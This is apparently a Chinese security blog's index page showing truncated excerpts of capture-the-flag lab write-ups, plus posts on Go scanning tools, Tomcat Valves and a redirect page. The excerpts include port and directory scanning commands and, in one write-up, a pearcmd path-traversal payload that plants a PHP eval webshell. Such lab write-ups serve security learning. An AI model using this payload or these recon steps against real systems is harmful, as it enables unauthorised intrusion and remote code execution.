最近在 b 站上刷到了一个用 go 做工具的视频，正巧之前下到过相关的电子书，这里正好学习学习。 基础学习测试端口可用性正常 nmap 扫描测试 1-1024 端口： 1234567891011121314nmap -p 1-1024 scanme.nmap.orgStarting Nmap 7.94 ( https://nmap.org ) at 2024-08-19 18:37 中国标准时间Nmap scan report for scanme.nmap.org (45.33.32.156)Host is up (0.22s latency).Not shown: 1016 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh79/tcp filtered finger80/tcp open http111/tcp filtered rpcbind135/tcp filtered msrpc137/tcp filtered netbios-ns139/tcp filtered netbi ...

信息搜集12345678start infoscan10.10.11.29:22 open10.10.11.29:80 open10.10.11.29:3000 open[*] alive ports len is: 3start vulscan[*] WebTitle http://10.10.11.29:3000 code:200 len:2832 title:None[*] WebTitle http://10.10.11.29 code:302 len:225 title:Redirecting... 跳转url: http://lantern.htb/ 加下 hostswhatweb 看下指纹，这里发现有 Skipper Proxy。 1whatweb http://lantern.htb -v 80 /vacancies路由下可以上传 pdf 文件。但是似乎这个并不可以。3000 是一个后台。观察后台时候能发现 3000 端有个路由建立 websocket：/_blazor而且能注意到 3000 端后台中有 js 源代码引用位置： SSRF ...

信息搜集简单扫下： 123456start infoscan10.10.11.28:80 open10.10.11.28:22 open[*] alive ports len is: 2start vulscan[*] WebTitle http://10.10.11.28 code:200 len:3670 title:Sea - Home 进入 80 页面，简单浏览发现页面 ：http://sea.htb/contact.php添加下 host，然后访问，根据源代码中的主要路由：可以知道这是主题文件，可以尝试访问 README.md 123456789101112131415# WonderCMS bike theme## DescriptionIncludes animations.## Author: turboblack## Preview## How to use1. Login to your WonderCMS website.2. Click "Settings" an ...

Tomcat Valve什么是 Valve 和 Pipeline Tomcat中容器的pipeline机制 - coldridgeValley - 博客园 没错，V 社中的 V 就是 Valve 的缩写（阀），因此 steam （蒸汽）这个意思就很明确了 XD 在 Tomcat 中，Pipeline和 Valve是其处理请求的重要概念。 Pipeline 是一系列 Valve 的有序集合。它类似于一个处理请求的流水线，每个 Valve 都代表一个处理步骤。 Valve 是 Pipeline 中的处理单元，负责执行特定的任务，例如身份验证、访问控制、日志记录、请求过滤等。 而 Tomcat 由 Connector 和 Container组成，请求由 Connector 包装为 Request 后交 Container 处理，第一层是 Engine 容器。Engine 不直接调用 Host 处理请求，而是通过 Pipeline 组件。Container 有 4 种：Engine、Host、Context、Wrapper，相互包含。4 种容器都有 Pipeline 组件，每个 P ...

Season 6 Week 1 晚上睡不着觉，打一发。这 tm 是中等？ 信息搜集fscan 一把嗦 123456start infoscan10.10.11.27:80 open10.10.11.27:22 open[*] alive ports len is: 2start vulscan[*] WebTitle http://10.10.11.27 code:302 len:154 title:302 Found 跳转url: http://itrc.ssg.htb/ 扫到三级域名，添加hosts。 pearcmd上来看指纹是个 php，有文件上传，打半天没打动，后面一查 wp 用 pearcmd，因为是 tp。 1/?page=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=eval($_REQUEST[1]);?>+/var/www/itrc/uploads/shell.php 然后访问上传地 ...

0xdf hacks stuff 这个有个什么 Guided Mode，好像是有流程的，学习下思路。这次复现了两条线路。 FTP + SMBTask 1 How many of the nmap top 1000 TCP ports are open on the remote host? nmap 不指定时默认就是 top 1000 端口。或者可以使用--top-ports X来指定 1nmap -sT 10.10.10.3 Task 2 What version of VSFTPd is running on Lame? 需要使用 nmap 扫描详细信息： 12345678910111213141516171819202122232425262728293031323334353637383940nmap -Pn -sVC -p21,22,139,445 -oN namp.txt 10.10.10.3PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 2.3.4| ftp-syst: | ...

信息搜集只有 22 和 80 端口开放。 123456start infoscan10.10.11.23:22 open10.10.11.23:80 open[*] alive ports len is: 2start vulscan[*] WebTitle http://10.10.11.23 code:302 len:277 title:302 Found 跳转url: http://permx.htb 添加下hosts文件。 目录扫描1gobuster dir -u http://permx.htb/ -w /usr/share/wordlists/dirb/common.txt 有文件泄露，http://permx.htb/lib/实际查看发现都是一些 css 和 js 文件。php 文件页没有什么帮助。 子域名扫描1gobuster vhost -u http://permx.htb --append-domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million ...

前言这几天真是忙烂了，交接加上项目再加上各种活，各种东西做起来也贼吃力，感觉怎么活得这么累捏？ 编写原因这几年能注意到越来越多的网站平台都会自家的产品中添加了一个安全跳转的页面。比如 QQ 的未认证的页面。我看到一些博主用上了单独开一个 safe.html ，但实际上这样还是在同一域名下操作，还是会降低主域名的 SEO。所以这个推荐挂载在其他域名下面，比如我的 safe-trans.natro92.fun。本来觉得代码量也就 100 多行两小时就写完了，调了一下午。感觉也是无敌了，修修改改，又出来一座史山。💩也不多说了，如果有相同需求的自己拉一下就好了。中间跳转页面的前端部分参考了一些其他的优秀代码，前端的代码在下面，如果喜欢的欢迎给一个 star。 中转页前端部分：GitHub - natro92/safe-transfer: 一个中转页面hexo 后端检测部分： hexo-safe-transferGitHub - natro92/hexo-safe-transfer: Add a safe transfer page to facilitate third ...

信息搜集123456start infoscan10.10.11.11:80 open10.10.11.11:22 open[*] alive ports len is: 2start vulscan[*] WebTitle http://10.10.11.11 code:200 len:15949 title:None 只有一个 80 入口。扫下目录： 1234567891011121314151617181920212223242526272829303132gobuster dir -u http://10.10.11.11/ -w /usr/share/wordlists/dirb/common.txt -x php===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)================================== ...